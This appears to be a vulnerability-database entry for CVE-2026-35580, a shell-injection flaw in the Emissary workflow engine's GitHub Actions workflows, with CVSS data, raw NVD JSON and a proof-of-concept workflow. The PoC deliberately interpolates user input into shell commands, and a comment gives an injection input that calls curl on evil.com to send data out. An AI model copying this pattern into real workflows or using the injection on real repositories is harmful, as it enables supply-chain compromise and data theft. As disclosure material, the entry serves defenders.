Security Vulnerability Report
中文
CVE-2026-35580 CVSS 9.1 CRITICAL

CVE-2026-35580

Published: 2026-04-07 17:16:33
Last Modified: 2026-04-16 17:59:03
Source: [email protected]

Description

Emissary is a P2P based data-driven workflow engine. Prior to 8.39.0, GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users. This vulnerability is fixed in 8.39.0.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nsa:emissary:*:*:*:*:*:*:*:* - VULNERABLE
Emissary < 8.39.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Vulnerable Workflow Concept (CVE-2026-35580) # An attacker with write access can trigger this workflow with malicious input. name: Build Emissary on: workflow_dispatch: inputs: config_option: description: 'Configuration option' required: true default: 'default_value' jobs: build: runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v3 - name: Build with user input # VULNERABILITY: The input is interpolated directly into the shell command. # If input is: 'value; curl http://evil.com/exfil', the curl command will execute. run: | echo "Starting build with configuration: ${{ github.event.inputs.config_option }}" ./configure --opt="${{ github.event.inputs.config_option }}" make all

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35580", "sourceIdentifier": "[email protected]", "published": "2026-04-07T17:16:33.307", "lastModified": "2026-04-16T17:59:02.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emissary is a P2P based data-driven workflow engine. Prior to 8.39.0, GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users. This vulnerability is fixed in 8.39.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nsa:emissary:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.0", "versionEndIncluding": "8.38.0", "matchCriteriaId": "63C8A099-EC01-496B-A224-0B1E8AA2A980"}]}]}], "references": [{"url": "https://github.com/NationalSecurityAgency/emissary/pull/1286", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/NationalSecurityAgency/emissary/pull/1288", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.